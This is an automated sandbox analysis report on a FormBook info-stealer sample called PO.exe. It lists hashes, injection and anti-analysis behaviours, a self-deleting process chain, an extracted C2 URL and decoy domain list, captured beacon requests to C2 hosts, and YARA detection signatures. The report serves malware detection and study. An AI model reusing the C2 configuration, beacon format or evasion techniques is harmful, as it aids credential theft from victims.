Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PO.exe

Overview

General Information

Sample Name:PO.exe
Analysis ID:383905
MD5:665cb19601850467af3ee7d9fd0e0350
SHA1:8ac40ef9fa5100a39b14258d8d8e562cefd7202c
SHA256:f3147300f9248e07ffd3a1b7131bed4febad8b0a88eeda27e606f36d04ff1340
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO.exe (PID: 5584 cmdline: 'C:\Users\user\Desktop\PO.exe' MD5: 665CB19601850467AF3EE7D9FD0E0350)
    • PO.exe (PID: 5536 cmdline: 'C:\Users\user\Desktop\PO.exe' MD5: 665CB19601850467AF3EE7D9FD0E0350)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 3980 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 1320 cmdline: /c del 'C:\Users\user\Desktop\PO.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.c-voyageinc.com/r4ei/"], "decoy": ["8clintonstreet.com", "sherylhotpepperblends.com", "eucham.asia", "earnestqueen.com", "vstexchange.com", "theoutofbounds.com", "allincursive.com", "getgenevieved.com", "commonlawpeoplesassembly.net", "brideclubstorerastreamento.com", "cngelectricaldesign.com", "mizmaleather.com", "nicolabenge.com", "babyboxbuy.com", "xaydungquan9.com", "hclifechurch.com", "cwyxonlp.icu", "inocentkidd.com", "worldhw.com", "soul.exchange", "garshbedmi.info", "hayratindonesia.com", "optimummedical-uk.com", "jagocopywriter.com", "loandong.com", "tnacharters.com", "rdj-cpa.com", "nklwmb.com", "baykusbaskimerkezi.xyz", "websiteworlda-z.com", "gulumsekoop.xyz", "artforthebayarea.com", "hkafrfudl.icu", "thekhufureign.com", "stanfordcodingtutor.com", "puoynios.website", "saearners.info", "epipdfhany.com", "cowboycooloutfitters.net", "therealrefinery.com", "royal-english-academy.com", "dante.report", "montonvuraeditted.space", "webuytampabayhouses.com", "phorice.com", "juxrams.info", "francisboyrd.com", "edifice-base.com", "shjzly.com", "frisdrank.deals", "cannajointn.com", "dianshi.ink", "droneserviceshouston.com", "swaymontoya.com", "omvvv.com", "yourherogarden.net", "areenaarora.com", "complex-kokukenzyo.com", "minyakgelici.com", "municipiodeanton.net", "opimexico.com", "xgame.online", "squrl.network", "bayleafdenver.info"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.PO.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.PO.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.PO.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18419:$sqlite3step: 68 34 1C 7B E1
        • 0x1852c:$sqlite3step: 68 34 1C 7B E1
        • 0x18448:$sqlite3text: 68 38 2A 90 C5
        • 0x1856d:$sqlite3text: 68 38 2A 90 C5
        • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
        1.2.PO.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.PO.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.c-voyageinc.com/r4ei/"], "decoy": ["8clintonstreet.com", "sherylhotpepperblends.com", "eucham.asia", "earnestqueen.com", "vstexchange.com", "theoutofbounds.com", "allincursive.com", "getgenevieved.com", "commonlawpeoplesassembly.net", "brideclubstorerastreamento.com", "cngelectricaldesign.com", "mizmaleather.com", "nicolabenge.com", "babyboxbuy.com", "xaydungquan9.com", "hclifechurch.com", "cwyxonlp.icu", "inocentkidd.com", "worldhw.com", "soul.exchange", "garshbedmi.info", "hayratindonesia.com", "optimummedical-uk.com", "jagocopywriter.com", "loandong.com", "tnacharters.com", "rdj-cpa.com", "nklwmb.com", "baykusbaskimerkezi.xyz", "websiteworlda-z.com", "gulumsekoop.xyz", "artforthebayarea.com", "hkafrfudl.icu", "thekhufureign.com", "stanfordcodingtutor.com", "puoynios.website", "saearners.info", "epipdfhany.com", "cowboycooloutfitters.net", "therealrefinery.com", "royal-english-academy.com", "dante.report", "montonvuraeditted.space", "webuytampabayhouses.com", "phorice.com", "juxrams.info", "francisboyrd.com", "edifice-base.com", "shjzly.com", "frisdrank.deals", "cannajointn.com", "dianshi.ink", "droneserviceshouston.com", "swaymontoya.com", "omvvv.com", "yourherogarden.net", "areenaarora.com", "complex-kokukenzyo.com", "minyakgelici.com", "municipiodeanton.net", "opimexico.com", "xgame.online", "squrl.network", "bayleafdenver.info"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dllReversingLabs: Detection: 10%
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO.exeReversingLabs: Detection: 16%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 10.2.explorer.exe.51af834.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.PO.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.PO.exe.2670000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.PO.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PO.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: explorer.pdbUGP source: PO.exe, 00000001.00000002.294032142.00000000028B0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000002.511710561.0000000007260000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO.exe, 00000000.00000003.234541643.000000001EFF0000.00000004.00000001.sdmp, PO.exe, 00000001.00000002.293490936.0000000000B2F000.00000040.00000001.sdmp, explorer.exe, 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO.exe, explorer.exe
          Source: Binary string: C:\xampp\htdocs\Cryptor\1a839a6cf4cc488e888465f9ce8aa846\Loader\Loader\Release\d18g7xa93.pdb source: PO.exe, 00000000.00000002.242784001.0000000073352000.00000002.00020000.sdmp, 5t94xwjj.dll.0.dr
          Source: Binary string: explorer.pdb source: PO.exe, 00000001.00000002.294032142.00000000028B0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000002.511710561.0000000007260000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: C:\Users\user\Desktop\PO.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\PO.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.c-voyageinc.com/r4ei/
          Source: global trafficHTTP traffic detected: GET /r4ei/?_ZA0p2=cRhAr0dy1lG+6v8jj0sxWagS9ZGCZip2Fr4SFXT7OXMmHzjmweO35OAl28FoqWQGc0rZ&GzuLH=VBZLTBc0f HTTP/1.1Host: www.websiteworlda-z.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r4ei/?_ZA0p2=qFx0jq35EoqhqGMmxZfRcaIhnrtQSZTAjbNVWKcVQ7fc4zdL4G4zojbsIieSdo+D23N6&GzuLH=VBZLTBc0f HTTP/1.1Host: www.phorice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 44.227.76.166 44.227.76.166
          Source: C:\Windows\explorer.exeCode function: 3_2_06D537A2 getaddrinfo,setsockopt,recv,
          Source: global trafficHTTP traffic detected: GET /r4ei/?_ZA0p2=cRhAr0dy1lG+6v8jj0sxWagS9ZGCZip2Fr4SFXT7OXMmHzjmweO35OAl28FoqWQGc0rZ&GzuLH=VBZLTBc0f HTTP/1.1Host: www.websiteworlda-z.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /r4ei/?_ZA0p2=qFx0jq35EoqhqGMmxZfRcaIhnrtQSZTAjbNVWKcVQ7fc4zdL4G4zojbsIieSdo+D23N6&GzuLH=VBZLTBc0f HTTP/1.1Host: www.phorice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.cwyxonlp.icu
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 10:10:12 GMTServer: ApacheContent-Length: 269Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 77 65 62 73 69 74 65 77 6f 72 6c 64 61 2d 7a 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.websiteworlda-z.com Port 80</address></body></html>
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 0000000A.00000002.504257510.000000000569F000.00000004.00000001.sdmpString found in binary or memory: http://phorice.com
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.260348229.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
